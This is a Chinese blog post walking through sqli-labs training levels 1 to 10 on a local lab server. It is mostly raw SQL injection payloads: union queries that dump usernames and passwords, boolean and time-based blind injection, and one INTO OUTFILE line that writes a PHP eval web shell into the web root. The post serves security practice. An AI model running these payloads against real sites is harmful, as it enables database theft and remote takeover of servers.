<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">




<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

  <meta name="author" content="John Doe">





<title>sqli通关秘籍 | Hexo</title>



<link rel="icon" href="/favicon.png">



<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/nprogress/nprogress.css">



<script src="/lib/jquery.min.js"></script>


<script src="/lib/iconify-icon.min.js"></script>


<script src="https://cdn.tailwindcss.com?plugins=typography"></script>
<script>
  tailwind.config = {
    darkMode: "class",
  };
</script>


<script src="/lib/nprogress/nprogress.js"></script>

<script>
  $(document).ready(() => {
    NProgress.configure({
      showSpinner: false,
    });
    NProgress.start();
    $("#nprogress .bar").css({
      background: "#de7441",
    });
    $("#nprogress .peg").css({
      "box-shadow": "0 0 2px #de7441, 0 0 4px #de7441",
    });
    $("#nprogress .spinner-icon").css({
      "border-top-color": "#de7441",
      "border-left-color": "#de7441",
    });
    setTimeout(function () {
      NProgress.done();
      $(".fade").removeClass("out");
    }, 800);
  });
</script>

<script>
  (function () {
    const prefersDark =
      window.matchMedia &&
      window.matchMedia("(prefers-color-scheme: dark)").matches;
    const setting = localStorage.getItem("hexo-color-scheme") || "auto";
    if (setting === "dark" || (prefersDark && setting !== "light"))
      document.documentElement.classList.toggle("dark", true);
    let isDark = document.documentElement.classList.contains("dark");
  })();

  $(document).ready(function () {
    // init icon
    const prefersDark =
      window.matchMedia &&
      window.matchMedia("(prefers-color-scheme: dark)").matches;
    const isDark = document.documentElement.classList.contains("dark");
    $("#theme-icon").attr("icon", isDark ? "ri:moon-line" : "ri:sun-line");

    function toggleGiscusTheme() {
      const isDark = document.documentElement.classList.contains("dark");
      const giscusFrame = document.querySelector("iframe.giscus-frame");
      if (giscusFrame) {
        giscusFrame.contentWindow.postMessage(
          {
            giscus: {
              setConfig: {
                theme: isDark ? "dark" : "light",
              },
            },
          },
          "https://giscus.app"
        );
      }
    }


    // toggle dark mode
    function toggleDark() {
      let isDark = document.documentElement.classList.contains("dark");
      isDark = !isDark;
      const setting = localStorage.getItem("hexo-color-scheme") || "auto";
      document.documentElement.classList.toggle("dark", isDark);
      $("#theme-icon").attr("icon", isDark ? "ri:moon-line" : "ri:sun-line");
      if (prefersDark === isDark) {
        localStorage.setItem("hexo-color-scheme", "auto");
      } else {
        localStorage.setItem("hexo-color-scheme", isDark ? "dark" : "light");
      }
      toggleGiscusTheme();
    }
    $("#toggle-dark").click(toggleDark);
    // listen dark mode change
    window
      .matchMedia("(prefers-color-scheme: dark)")
      .addEventListener("change", (e) => {
        const setting = localStorage.getItem("hexo-color-scheme") || "auto";
        if (setting === "auto") {
          document.documentElement.classList.toggle("dark", e.matches);
          $("#theme-icon").attr(
            "icon",
            e.matches ? "ri:moon-line" : "ri:sun-line"
          );
          toggleGiscusTheme();
        }
      });
  });
</script>




<meta name="generator" content="Hexo 6.3.0"></head>
<body class="font-sans bg-white dark:bg-zinc-900 text-gray-700 dark:text-gray-200">
  <header class="fixed w-full px-5 py-1 z-10 backdrop-blur-xl backdrop-saturate-150 border-b border-black/5">
  <div class="max-auto">
    <nav class="flex items-center text-base">
      <a href="/" class="group">
        <h2 class="font-medium tracking-tighterp text-l p-2">
          <img class="w-5 mr-2 inline-block transition-transform group-hover:rotate-[30deg]" id="logo" src="/images/logo.svg" alt="Hexo" />
          Hexo
        </h2>
      </a>
      <div id="header-title" class="opacity-0 md:ml-2 md:mt-[0.1rem] text-xs font-medium whitespace-nowrap overflow-hidden overflow-ellipsis">
        sqli通关秘籍
      </div>
      <div class="flex-1"></div>
      <div class="flex items-center gap-3">
        
          <a class="hidden sm:flex" href="/archives">Posts</a>
        
        
          
            <a class="w-5 h-5 hidden sm:flex" title="Github" target="_blank" rel="noopener" href="https://github.com/xbmlz">
              <iconify-icon width="20" icon="ri:github-line"></iconify-icon>
            </a>
          
        
        <a class="w-5 h-5" title="toggle theme" id="toggle-dark">
          <iconify-icon width="20" icon="" id="theme-icon"></iconify-icon>
        </a>
      </div>
      <div class="flex items-center justify-center gap-3 ml-3 sm:hidden">
        <span class="w-5 h-5" aria-hidden="true" role="img" id="open-menu">
          <iconify-icon width="20" icon="carbon:menu" ></iconify-icon>
        </span>
        <span class="w-5 h-5 hidden" aria-hidden="true" role="img" id="close-menu">
          <iconify-icon  width="20" icon="carbon:close" ></iconify-icon>
        </span>
      </div>
    </nav>
  </div>
</header>
<div id="menu-panel" class="h-0 overflow-hidden sm:hidden fixed left-0 right-0 top-12 bottom-0 z-10">
  <div id="menu-content" class="relative z-20 bg-white/80 px-6 sm:px-8 py-2 backdrop-blur-xl -translate-y-full transition-transform duration-300">
    <ul class="nav flex flex-col sm:flex-row text-sm font-medium">
      
        <li class="nav-portfolio sm:mx-2 border-b sm:border-0 border-black/5 last:border-0 hover:text-main">
          <a href="/archives" class="flex h-12 sm:h-auto items-center">Posts</a>
        </li>
      
    </ul>
  </div>
  <div class="mask bg-black/20 absolute inset-0"></div>
</div>

  <main class="p-12">
    <!-- css -->

<link rel="stylesheet" href="/lib/fancybox/fancybox.min.css">


<link rel="stylesheet" href="/lib/tocbot/tocbot.min.css">

<!-- toc -->

  <!-- tocbot -->
<nav class="post-toc toc text-sm w-48 relative top-32 right-0 opacity-70 hidden lg:block" style="position: fixed !important;"></nav>


<section class="px-6 max-w-prose mx-auto md:px-0">
  <!-- header -->
  <header class="overflow-hidden pt-6 pb-6 md:pt-12">
    <div class="pt-4 md:pt-6">
      <h1 id="article-title" class="text-[2rem] font-bold leading-snug mb-4 md:mb-6 md:text-[2.6rem]">
        sqli通关秘籍
      </h1>
      <p class="mb-6">
        
      </p>
      <div>
        <section class="flex items-center gap-3 text-sm">
          <time>2023-09-16 11:43:26</time>
          <span class="text-gray-400">·</span>
          <span>5 min</span>
          <span class="text-gray-400">·</span>
          <span>963 words</span>
        </section>
      </div>
    </div>
  </header>
  <!-- content -->
  <article class="post-content mt-10 prose dark:prose-invert post-content">
    <h6 id="Less-1：字符型注入，单引号闭合，有回显，用联合查询"><a href="#Less-1：字符型注入，单引号闭合，有回显，用联合查询" class="headerlink" title="Less-1：字符型注入，单引号闭合，有回显，用联合查询"></a>Less-1：字符型注入，单引号闭合，有回显，用联合查询</h6><p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-1/?id=1">http://192.168.2.11:81/Less-1/?id=1</a> order by 3–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-1/?id=-1">http://192.168.2.11:81/Less-1/?id=-1</a>‘ union select 1,2,3–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-1/?id=-1">http://192.168.2.11:81/Less-1/?id=-1</a>‘ union select 1,2,database() –+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-1/?id=-1">http://192.168.2.11:81/Less-1/?id=-1</a>‘ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;’security’–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-1/?id=-1">http://192.168.2.11:81/Less-1/?id=-1</a>‘ union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;’users’–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-1/?id=-1">http://192.168.2.11:81/Less-1/?id=-1</a>‘ union select 1,group_concat(username),group_concat(password) from users–+</p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161034576.png" alt="image-20230916103424670"></p>
<h6 id="Less-2：数字型注入，已闭合，有回显，用联合查询（步骤同上）"><a href="#Less-2：数字型注入，已闭合，有回显，用联合查询（步骤同上）" class="headerlink" title="Less-2：数字型注入，已闭合，有回显，用联合查询（步骤同上）"></a>Less-2：数字型注入，已闭合，有回显，用联合查询（步骤同上）</h6><p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-2/?id=-1">http://192.168.2.11:81/Less-2/?id=-1</a> union select 1,group_concat(id),group_concat(email_id) from emails–+</p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161035523.png" alt="image-20230916103525185"></p>
<h6 id="Less-3：字符型注入，单引号单括号闭合，有回显，用联合查询（步骤同上）"><a href="#Less-3：字符型注入，单引号单括号闭合，有回显，用联合查询（步骤同上）" class="headerlink" title="Less-3：字符型注入，单引号单括号闭合，有回显，用联合查询（步骤同上）"></a>Less-3：字符型注入，单引号单括号闭合，有回显，用联合查询（步骤同上）</h6><p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-3/?id=-1">http://192.168.2.11:81/Less-3/?id=-1</a>‘) union select 1,group_concat(username),group_concat(password) from users–+</p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161037551.png" alt="image-20230916103718862"></p>
<h6 id="Less-4：字符型注入，双引号单括号闭合，有回显，用联合查询（步骤同上）"><a href="#Less-4：字符型注入，双引号单括号闭合，有回显，用联合查询（步骤同上）" class="headerlink" title="Less-4：字符型注入，双引号单括号闭合，有回显，用联合查询（步骤同上）"></a>Less-4：字符型注入，双引号单括号闭合，有回显，用联合查询（步骤同上）</h6><p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-4/?id=-1">http://192.168.2.11:81/Less-4/?id=-1</a>“) union select 1,group_concat(username),group_concat(password) from users–+</p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161038177.png" alt="image-20230916103832227"></p>
<h6 id="Less-5：字符型注入，单引号闭合，有报错提示，无回显，盲注"><a href="#Less-5：字符型注入，单引号闭合，有报错提示，无回显，盲注" class="headerlink" title="Less-5：字符型注入，单引号闭合，有报错提示，无回显，盲注"></a>Less-5：字符型注入，单引号闭合，有报错提示，无回显，盲注</h6><p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-5/?id=1">http://192.168.2.11:81/Less-5/?id=1</a>‘ and length((select database()))&#x3D;8–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-5/?id=1">http://192.168.2.11:81/Less-5/?id=1</a>‘ and ascii(substr((select database()),1,1))&#x3D;115–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-5/?id=1">http://192.168.2.11:81/Less-5/?id=1</a>‘ and length((select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()))&#x3D;29–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-5/?id=1">http://192.168.2.11:81/Less-5/?id=1</a>‘ and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),1,1))&#x3D;101–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-5/?id=1">http://192.168.2.11:81/Less-5/?id=1</a>‘ and length((select group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;’users’))&#x3D;20–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-5/?id=1">http://192.168.2.11:81/Less-5/?id=1</a>‘ and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;’users’),1,1))&#x3D;105–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-5/?id=1">http://192.168.2.11:81/Less-5/?id=1</a>‘ and length((select group_concat(username) from users))&#x3D;91–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-5/?id=1">http://192.168.2.11:81/Less-5/?id=1</a>‘ and ascii(substr((select group_concat(username) from users),1,1))&#x3D;68–+</p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161040141.png" alt="image-20230916104033012"></p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161040364.png" alt="image-20230916104045478"></p>
<h6 id="Less-6：字符型注入，双引号闭合，有报错提示，无回显，盲注（步骤同上）"><a href="#Less-6：字符型注入，双引号闭合，有报错提示，无回显，盲注（步骤同上）" class="headerlink" title="Less-6：字符型注入，双引号闭合，有报错提示，无回显，盲注（步骤同上）"></a>Less-6：字符型注入，双引号闭合，有报错提示，无回显，盲注（步骤同上）</h6><p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-5/?id=1">http://192.168.2.11:81/Less-5/?id=1</a>“ and ascii(substr((select group_concat(id) from emails),1,1))&#x3D;49–+</p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161041835.png" alt="image-20230916104126319"></p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161041750.png" alt="image-20230916104136852"></p>
<h6 id="Less-7：字符型注入，单引号两括号闭合，提示使用一句话木马"><a href="#Less-7：字符型注入，单引号两括号闭合，提示使用一句话木马" class="headerlink" title="Less-7：字符型注入，单引号两括号闭合，提示使用一句话木马"></a>Less-7：字符型注入，单引号两括号闭合，提示使用一句话木马</h6><p><a target="_blank" rel="noopener" href="http://192.168.2.43:81/Less-7/?id=-1">http://192.168.2.43:81/Less-7/?id=-1</a>‘)) union select 1,2,3 into outfile “C:\Users\hx\Desktop\phpstudy_pro\WWW\7.php”–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.43:81/Less-7/?id=-1">http://192.168.2.43:81/Less-7/?id=-1</a>‘)) union select 1,2, “<?php eval($_POST['pw']);?>“ into outfile “C:&#x2F;&#x2F;users&#x2F;&#x2F;hx&#x2F;&#x2F;Desktop&#x2F;&#x2F;phpstudy_pro&#x2F;&#x2F;WWW&#x2F;&#x2F;7.php”–+</p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161043749.png" alt="image-20230916104315766"></p>
<h6 id="Less-8：字符型注入，单引号闭合，无回显，盲注"><a href="#Less-8：字符型注入，单引号闭合，无回显，盲注" class="headerlink" title="Less-8：字符型注入，单引号闭合，无回显，盲注"></a>Less-8：字符型注入，单引号闭合，无回显，盲注</h6><p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-8/?id=1">http://192.168.2.11:81/Less-8/?id=1</a>‘ and ascii(substr((select group_concat(username) from users),1,1))&#x3D;68–+</p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161043683.png" alt="image-20230916104349761"></p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161043994.png" alt="image-20230916104357439"></p>
<h6 id="Less-9：字符型注入，单引号闭合，页面无变化，时间注入-盲注"><a href="#Less-9：字符型注入，单引号闭合，页面无变化，时间注入-盲注" class="headerlink" title="Less-9：字符型注入，单引号闭合，页面无变化，时间注入&#x2F;盲注"></a>Less-9：字符型注入，单引号闭合，页面无变化，时间注入&#x2F;盲注</h6><p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-9/?id=1">http://192.168.2.11:81/Less-9/?id=1</a>‘ and if(1&#x3D;1,sleep(5),1)–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-9/?id=1">http://192.168.2.11:81/Less-9/?id=1</a>‘ and if(length((select database()))&#x3D;8,sleep(5),1)–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-9/?id=1">http://192.168.2.11:81/Less-9/?id=1</a>‘ and if(ascii(substr((select database()),1,1))&#x3D;115,sleep(5),1)–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-9/?id=1">http://192.168.2.11:81/Less-9/?id=1</a>‘ and if(length((select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()))&#x3D;29,sleep(5),1)–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-9/?id=1">http://192.168.2.11:81/Less-9/?id=1</a>‘ and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),1,1))&#x3D;101,sleep(5),1)–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-9/?id=1">http://192.168.2.11:81/Less-9/?id=1</a>‘ and if(length((select group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;’users’))&#x3D;20,sleep(5),1)–+     #判断当前表中字段的长度</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-9/?id=1">http://192.168.2.11:81/Less-9/?id=1</a>‘ and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;’users’),1,1))&#x3D;105,sleep(5),1)–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-9/?id=1">http://192.168.2.11:81/Less-9/?id=1</a>‘ and if(length((select group_concat(password) from users))&#x3D;25,sleep(5),1)–+</p>
<p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-9/?id=1">http://192.168.2.11:81/Less-9/?id=1</a>‘ and if(ascii(substr((select group_concat(password) from users),1,1))&#x3D;49,sleep(5),1)–+</p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161046881.png" alt="image-20230916104642396"></p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161046342.png" alt="image-20230916104651227"></p>
<h6 id="Less-10：字符型注入，双引号闭合，页面无变化，时间注入（步骤同上）"><a href="#Less-10：字符型注入，双引号闭合，页面无变化，时间注入（步骤同上）" class="headerlink" title="Less-10：字符型注入，双引号闭合，页面无变化，时间注入（步骤同上）"></a>Less-10：字符型注入，双引号闭合，页面无变化，时间注入（步骤同上）</h6><p><a target="_blank" rel="noopener" href="http://192.168.2.11:81/Less-10/?id=1">http://192.168.2.11:81/Less-10/?id=1</a>“ and if(ascii(substr((select group_concat(password) from users),1,1))&#x3D;49,sleep(5),1)–+</p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161047687.png" alt="image-20230916104715603"></p>
<p><img src="https://raw.githubusercontent.com/huangxia-boke/img1/main/img/202309161047024.png" alt="image-20230916104724282"></p>

  </article>
  <!-- tag -->
  <div class="mt-12 pt-6 border-t border-gray-200">
    
      
        <span class="bg-gray-100 dark:bg-gray-700 px-2 py-1 m-1 text-sm rounded-md transition-colors hover:bg-gray-200">
          <a href="/tags/%E6%89%93%E9%9D%B6/">打靶</a>
        </span>
      
    
  </div>
  <!-- prev and next -->
  <div class="flex justify-between mt-12 pt-6 border-t border-gray-200">
    <div>
      
        <a href="/2023/09/16/%E6%89%93%E9%9D%B6Hackademic/" class="text-sm text-gray-400 hover:text-gray-500 flex justify-center">
          <iconify-icon width="20" icon="ri:arrow-left-s-line" data-inline="false"></iconify-icon>
          打靶Hackademic
        </a>
      
    </div>
    <div>
      
        <a href="/2023/09/16/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" class="text-sm text-gray-400 hover:text-gray-500 flex justify-center">
          反序列化漏洞
          <iconify-icon width="20" icon="ri:arrow-right-s-line" data-inline="false"></iconify-icon>
        </a>
      
    </div>
  </div>
  <!-- comment -->
  <div class="article-comments mt-12">
    

  </div>
</section>
<!-- js inspect -->

<script src="/lib/clipboard.min.js"></script>


<script async src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    "HTML-CSS": {
        preferredFont: "TeX",
        availableFonts: ["STIX","TeX"],
        linebreaks: { automatic:true },
        EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
        inlineMath: [ ["$", "$"], ["\\(","\\)"] ],
        processEscapes: true,
        ignoreClass: "tex2jax_ignore|dno",
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
        equationNumbers: { autoNumber: "AMS" },
        noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } },
        Macros: { href: "{}" }
    },
    messageStyle: "none"
  });
</script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>



<script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
<script>
  $(document).ready(() => {
    const maraidConfig = {
      theme: "default",
      logLevel: 3,
      flowchart: { curve: "linear" },
      gantt: { axisFormat: "%m/%d/%Y" },
      sequence: { actorMargin: 50 },
    };
    mermaid.initialize(maraidConfig);
  });
</script>



<script src="/lib/fancybox/fancybox.umd.min.js"></script>

<script>
  $(document).ready(() => {
    $('.post-content').each(function(i){
      $(this).find('img').each(function(){
        if ($(this).parent().hasClass('fancybox') || $(this).parent().is('a')) return;
        var alt = this.alt;
        if (alt) $(this).after('<span class="fancybox-alt">' + alt + '</span>');
        $(this).wrap('<a class="fancybox-img" href="' + this.src + '" data-fancybox=\"gallery\" data-caption="' + alt + '"></a>')
      });
      $(this).find('.fancybox').each(function(){
        $(this).attr('rel', 'article' + i);
      });
    });

    Fancybox.bind('[data-fancybox="gallery"]', {
        // options
    })
  })
</script>

<!-- tocbot begin -->

<script src="/lib/tocbot/tocbot.min.js"></script>

<script>
  $(document).ready(() => {
      tocbot.init({
        // Where to render the table of contents.
        tocSelector: '.post-toc',
        // Where to grab the headings to build the table of contents.
        contentSelector: '.post-content',
        // Which headings to grab inside of the contentSelector element.
        headingSelector: 'h1, h2, h3',
        // For headings inside relative or absolute positioned containers within content.
        hasInnerContainers: true,
    });
  })
</script>
<!-- tocbot end -->


  </main>
  <footer class="flex flex-col h-40 items-center justify-center text-gray-400 text-sm">
  <!-- busuanzi -->
  
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<!-- Busuanzi Analytics -->
<div class="flex items-center gap-2">
  <span>Visitor Count</span>
  <span id="busuanzi_value_site_uv"></span>
  <span>Totalview</span>
  <span id="busuanzi_value_site_pv"></span>
</div>
<!-- End Busuanzi Analytics -->


  <!-- copyright -->
  <div class="flex items-center gap-2">
    <span>© 2022</span>
    <iconify-icon width="18" icon="emojione-monotone:maple-leaf" ></iconify-icon>
    <a href="https://github.com/xbmlz" target="_blank" rel="noopener noreferrer">xbmlz</a>
  </div>
  <!-- powered by -->
  <div class="flex items-center gap-2">
    <span>Powered by</span>
    <a href="https://hexo.io/" target="_blank" rel="noopener noreferrer">Hexo</a>
    <span>&</span>
    <a href="https://github.com/xbmlz/hexo-theme-maple" target="_blank" rel="noopener noreferrer">Maple</a>
  </div>

</footer>

  <iconify-icon class="fixed right-4 bottom-10 z-100 opacity-0" width="24" icon="ion:arrow-up-c" id="go-top"></iconify-icon>
  
<script src="/js/main.js"></script>


  <script>
    $(document).ready(function () {
      const mapleCount = "10";
      const speed = "0.5";
      const mapleEl = document.getElementById("maple");
      const maples = Array.from({ length: mapleCount }).map(() => {
        const maple = document.createElement("div");
        const scale = Math.random() * 0.5 + 0.5;
        const offset = Math.random() * 2 - 1;
        const x = Math.random() * mapleEl.clientWidth;
        const y = -Math.random() * mapleEl.clientHeight;
        const duration = 10 / speed;
        const delay = -duration;
        maple.className = "maple";
        maple.style.width = `${24 * scale}px`;
        maple.style.height = `${24 * scale}px`;
        maple.style.left = `${x}px`;
        maple.style.top = `${y}px`;
        maple.style.setProperty("--maple-fall-offset", offset);
        maple.style.setProperty("--maple-fall-height", `${Math.abs(y) + mapleEl.clientHeight}px`);
        maple.style.animation = `fall ${duration}s linear infinite`;
        maple.style.animationDelay = `${delay}s`;
        mapleEl.appendChild(maple)
        return maple
      })
    });
  </script>
  


  <div class="w-screen h-screen -z-999" id="maple"></div>
</body>

</html>
